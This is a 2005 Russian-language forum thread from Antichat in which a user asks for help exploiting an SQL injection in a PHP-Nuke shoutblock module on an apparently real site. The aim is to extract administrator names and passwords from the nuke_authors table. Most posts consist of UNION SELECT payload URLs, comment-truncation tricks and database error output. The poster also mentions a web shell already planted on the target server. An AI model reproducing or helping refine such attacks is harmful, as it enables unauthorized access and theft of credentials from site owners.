HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу помогите с sql инъекцией
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

помогите с sql инъекцией
  #1  
Старый 06.07.2005, 11:24
z0pa
Новичок
Регистрация: 06.07.2005
Сообщений: 5
Провел на форуме:
2558

Репутация: 0
По умолчанию помогите с sql инъекцией
есть скрипт в нем такая строка:
$query = "select * from ".$prefix."_quiecom_shoutblock order by id desc limit $start, $conf[17]";
переменная $start не фильтурется и берется из значения урла OFFSET, переменная $conf[17] всегда равно 25
я пробовал сделать так:
/modules.php?name=Qshoutblock&offset=0,25 UNION SELECT null,name,pwd,aid,null FROM nuke_authors LIMIT 0
переменную $conf[17] он засунуть засунуть в конец запроса и получиться
... FROM nuke_authors LIMIT 0,25
---------
но почему то не прокатывает так, пробовал провести через шелл пхпешный он мне выдает ошибку, пробовал и так и сяк понял что не хочет работать с order by ..., без него скрипт выполнялся (в шелле).
подскажите возможно ли всё таки как то составить запрос что бы он выдал мне значения из другой таблицы
 
Ответить с цитированием

  #2  
Старый 06.07.2005, 14:23
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
попробуй после после nuke_authors поставить /*
т.е. у тебя получится:
/modules.php?name=Qshoutblock&offset=0,25 UNION SELECT null,name,pwd,aid,null FROM nuke_authors /*
LIMIT 0 - хз, но помоему это можно опустить..
по поводу таблиц - ну тебе наверно лучше знать какие там существуют таблицы, главное, чтобы sql-инъекция была).
 
Ответить с цитированием

  #3  
Старый 06.07.2005, 14:36
z0pa
Новичок
Регистрация: 06.07.2005
Сообщений: 5
Провел на форуме:
2558

Репутация: 0
По умолчанию
2Rebz:
пробовал и так, но экран остается белым и всё.
какие таблицы там я знаю, это нюковский движек. там лежит phpRemoteView и в нем я могу на ПХП выполнять скрипты, делал так:
$dbc = mysql_connect('localhost','юзер','') ;
mysql_select_db('nkchatr7_nuke',$dbc);
$query = "select * from nuke_quiecom_shoutblock order by id desc limit 0,1 UNION SELECT 0,name,pwd,aid,0 FROM nuke_authors";
$res = mysql_query($query,$dbc);
while($str = mysql_fetch_array($res)) var_dump($str);
mysql_close($dbc);
так не работает даёт ошибку, если запрос изменить т.е. заключить в скобки всё до UNION работает и если убрать ORDER BY тоже работает, но этого я не могу сделать через УРЛ. вот я просто и хочу знать всё таки через УРЛ как то можно пробиться в таблицу nuke_authors или все таки бесполезно.
 
Ответить с цитированием

  #4  
Старый 06.07.2005, 14:46
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
Что-то я не заметил...
SQL-inj. проверяется наличием ковычки.. т.е,:
/modules.php?name=Qshoutblock&offset=0,25' . Ковычка не экранируется?
Цитата:
если запрос изменить т.е. заключить в скобки всё до UNION
так и надо делать.. если инъекция есть, то в дальшнейшем будет:
/modules.php?name=Qshoutblock&offset=0,25' union select .... from nuke_authors /*

попробуй это в браузере...
ORDER BY кажется нельзя убрать.. только если в комменты засунуть.. - /*
 
Ответить с цитированием

  #5  
Старый 06.07.2005, 14:59
z0pa
Новичок
Регистрация: 06.07.2005
Сообщений: 5
Провел на форуме:
2558

Репутация: 0
По умолчанию
да, если написать:
/modules.php?name=Qshoutblock&offset=0'
выдает ошибку:
Error in query: select * from nuke_quiecom_shoutblock order by id desc limit 0', 25. Array
вот от сюда я и начать плясать
но ORDER BY ни как через УРЛ не закоментировать, ибо переменная через которую можно инъектировать уже после него находиться.
может всё таки как то можно их увязать?!
чувствую это дырка, но где она
Последний раз редактировалось z0pa; 06.07.2005 в 15:06..
 
Ответить с цитированием

  #6  
Старый 06.07.2005, 15:02
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
ага, значит всё нормуль.. инъекция есть..
в дальшнейших запросах эту ковычку не убирай..
 
Ответить с цитированием

  #7  
Старый 06.07.2005, 15:15
z0pa
Новичок
Регистрация: 06.07.2005
Сообщений: 5
Провел на форуме:
2558

Репутация: 0
По умолчанию
по идее должно нормально сработать такой урл:
/modules.php?name=Qshoutblock&offset=0,25 /*
но он выкидывает на начало страницы, походу дела стоит какой то фильтр
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.